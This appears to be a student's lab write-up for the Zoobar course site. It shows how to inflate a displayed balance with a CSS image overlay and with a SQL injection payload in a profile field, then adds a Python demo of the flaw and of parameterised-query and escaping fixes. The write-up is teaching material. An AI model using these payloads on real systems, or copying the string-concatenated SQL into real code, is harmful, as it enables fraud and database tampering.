Information Security Practice Lab2 - CSS

Posted by 貓耳柯基腿 on 2020-12-27


Installing php5.6, php5.6-mysql, apache2 and mysql5.7 on Ubuntu 20.04

Install php5.6, php5.6-mysql and apache2

    sudo apt-get install -y language-pack-en-base
    sudo LC_ALL=en_US.UTF-8 add-apt-repository ppa:ondrej/php
    sudo add-apt-repository ppa:ondrej/php
    sudo apt-get update
    sudo apt-get install php5.6
    sudo apt-get install php5.6-mysql
    sudo apt-get install apache2
    sudo a2dismod php7.4
    sudo a2enmod php5.6
    sudo service apache2 restart

Install mysql5.7

Follow https://blog.csdn.net/Deadly_97/article/details/111675825

Problem 1

Problem 2: finding vulnerabilities in the Zoobar website

Manage your profile in the zoobar website, make your zoobars appear more than you really own. That is, after you modify your profile, when others or yourself look up your profile, they will see more zoobars than you actually own.

Method 1: using CSS

  1. In user a's profile, enter

    <img src="http://106.13.136.87:8080/100.png" style="position:relative;top:-55px;right:-63px;width:34px;height:21px"/>

  2. When user b then enters the username a under User, the page shows a as having 100 zoobars; the image is positioned over the real balance, and a does not actually have 100.

Method 2: SQL injection

  1. In the source code, the SQL statement that handles the $profile parameter is built like this:

    $sql = "UPDATE Person SET Profile='$profile' ".
           "WHERE PersonID=$user->id";

  2. Suppose user a enters the following in their profile:

    ',Zoobars=9999,Profile='Welcome to my profile!

  3. The leading quote closes the Profile string literal, so the remainder is parsed as additional SET assignments. The SQL that is finally executed is:

    update Person set Profile='',Zoobars=9999,Profile='Welcome to my profile!' where PersonID=1;

  4. Looking up a's balance afterwards shows 9999 zoobars.
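As an added example (not part of the original post or of the zoobar code), the following Python script models the vulnerable PHP query from method 2 against an in-memory SQLite table, shows the parameterised query that stores the same payload as plain text, and escapes the profile on output so the method 1 `<img>` overlay cannot cover the balance. The table layout and the starting balance of 10 are assumptions.

```python
import html
import sqlite3

# Constructed payloads, copied from the two methods described above.
PAYLOAD_SQL = "',Zoobars=9999,Profile='Welcome to my profile!"
PAYLOAD_HTML = '<img src="http://106.13.136.87:8080/100.png" style="position:relative;top:-55px"/>'


def fresh_db():
    """In-memory stand-in for the zoobar Person table (assumed columns and a balance of 10)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Person (PersonID INTEGER PRIMARY KEY, Username TEXT, Zoobars INTEGER, Profile TEXT)")
    db.execute("INSERT INTO Person VALUES (1, 'a', 10, '')")
    return db


def update_profile_vulnerable(db, user_id, profile):
    # Mirrors the PHP string concatenation on the page: the closing quote in the
    # profile ends the Profile literal, and the rest is parsed as extra SET clauses.
    db.execute(f"UPDATE Person SET Profile='{profile}' WHERE PersonID={user_id}")
    db.commit()


def update_profile_safe(db, user_id, profile):
    # Parameterised query: the profile is bound as data and is never parsed as SQL.
    db.execute("UPDATE Person SET Profile=? WHERE PersonID=?", (profile, user_id))
    db.commit()


def zoobars_of(db, user_id):
    return db.execute("SELECT Zoobars FROM Person WHERE PersonID=?", (user_id,)).fetchone()[0]


def profile_of(db, user_id):
    return db.execute("SELECT Profile FROM Person WHERE PersonID=?", (user_id,)).fetchone()[0]


def render_profile(profile):
    # Escape on output: the <img> overlay is displayed as literal text instead of
    # being rendered on top of the balance shown to other users.
    return html.escape(profile, quote=True)


if __name__ == "__main__":
    db = fresh_db()
    update_profile_vulnerable(db, 1, PAYLOAD_SQL)
    print("vulnerable:", zoobars_of(db, 1), repr(profile_of(db, 1)))  # 9999 'Welcome to my profile!'
    db = fresh_db()
    update_profile_safe(db, 1, PAYLOAD_SQL)
    print("safe:", zoobars_of(db, 1), repr(profile_of(db, 1)))        # 10, payload stored verbatim
    print(render_profile(PAYLOAD_HTML))
```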
